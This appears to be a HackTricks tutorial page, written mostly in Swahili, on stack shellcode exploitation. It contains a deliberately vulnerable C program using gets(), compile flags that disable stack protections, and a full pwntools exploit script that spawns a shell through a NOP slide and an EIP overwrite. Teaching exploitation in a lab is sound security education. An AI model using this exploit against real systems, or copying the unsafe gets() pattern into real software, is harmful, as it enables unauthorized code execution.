Stack Shellcode

Reading time: 5 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Basic Information

Stack shellcode ni mbinu inayotumika katika binary exploitation ambapo mshambuliaji anaandika shellcode kwenye stack ya programu iliyo hatarini na kisha kubadilisha Instruction Pointer (IP) au Extended Instruction Pointer (EIP) ili kuelekeza kwenye eneo la shellcode hii, na kusababisha itekelezwe. Hii ni mbinu ya jadi inayotumika kupata ufikiaji usioidhinishwa au kutekeleza amri zisizo na mipaka kwenye mfumo wa lengo. Hapa kuna muhtasari wa mchakato, ikiwa ni pamoja na mfano rahisi wa C na jinsi unavyoweza kuandika exploit inayolingana kwa kutumia Python na pwntools.

C Example: A Vulnerable Program

Let's start with a simple example of a vulnerable C program:

c
#include <stdio.h>
#include <string.h>

void vulnerable_function() {
char buffer[64];
gets(buffer); // Unsafe function that does not check for buffer overflow
}

int main() {
vulnerable_function();
printf("Returned safely\n");
return 0;
}

Programu hii ina udhaifu wa buffer overflow kutokana na matumizi ya kazi ya gets().

Uundaji

Ili kuunda programu hii huku ukizima ulinzi mbalimbali (ili kuiga mazingira yenye udhaifu), unaweza kutumia amri ifuatayo:

sh
gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c
  • -fno-stack-protector: Inazima ulinzi wa stack.
  • -z execstack: Inafanya stack kuwa executable, ambayo ni muhimu kwa kutekeleza shellcode iliyohifadhiwa kwenye stack.
  • -no-pie: Inazima Position Independent Executable, ikifanya iwe rahisi kutabiri anwani ya kumbukumbu ambapo shellcode yetu itakuwa.
  • -m32: Inakusanya programu kama executable ya 32-bit, mara nyingi hutumiwa kwa urahisi katika maendeleo ya exploit.

Python Exploit using Pwntools

Here's how you could write an exploit in Python using pwntools to perform a ret2shellcode attack:

python
from pwn import *

# Set up the process and context
binary_path = './vulnerable'
p = process(binary_path)
context.binary = binary_path
context.arch = 'i386' # Specify the architecture

# Generate the shellcode
shellcode = asm(shellcraft.sh()) # Using pwntools to generate shellcode for opening a shell

# Find the offset to EIP
offset = cyclic_find(0x6161616c) # Assuming 0x6161616c is the value found in EIP after a crash

# Prepare the payload
# The NOP slide helps to ensure that the execution flow hits the shellcode.
nop_slide = asm('nop') * (offset - len(shellcode))
payload = nop_slide + shellcode
payload += b'A' * (offset - len(payload))  # Adjust the payload size to exactly fill the buffer and overwrite EIP
payload += p32(0xffffcfb4) # Supossing 0xffffcfb4 will be inside NOP slide

# Send the payload
p.sendline(payload)
p.interactive()

Hii script inajenga payload inayojumuisha NOP slide, shellcode, na kisha inabadilisha EIP kwa anwani inayotaja NOP slide, kuhakikisha shellcode inatekelezwa.

NOP slide (asm('nop')) inatumika kuongeza nafasi kwamba utekelezaji uta "slide" ndani ya shellcode yetu bila kujali anwani halisi. Badilisha hoja ya p32() kwa anwani ya mwanzo ya buffer yako pamoja na offset ili kuangukia kwenye NOP slide.

Ulinzi

  • ASLR inapaswa kuzuiliwa ili anwani iwe ya kuaminika katika utekelezaji tofauti au anwani ambapo kazi itahifadhiwa haitakuwa sawa kila wakati na unahitaji kuwa na leak ili kubaini wapi kazi ya win imepakiwa.
  • Stack Canaries pia inapaswa kuzuiliwa au anwani ya kurudi ya EIP iliyovunjika haitafuatiwa kamwe.
  • NX stack ulinzi utazuia utekelezaji wa shellcode ndani ya stack kwa sababu eneo hilo halitakuwa la kutekelezeka.

Mifano Mingine & Marejeleo

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks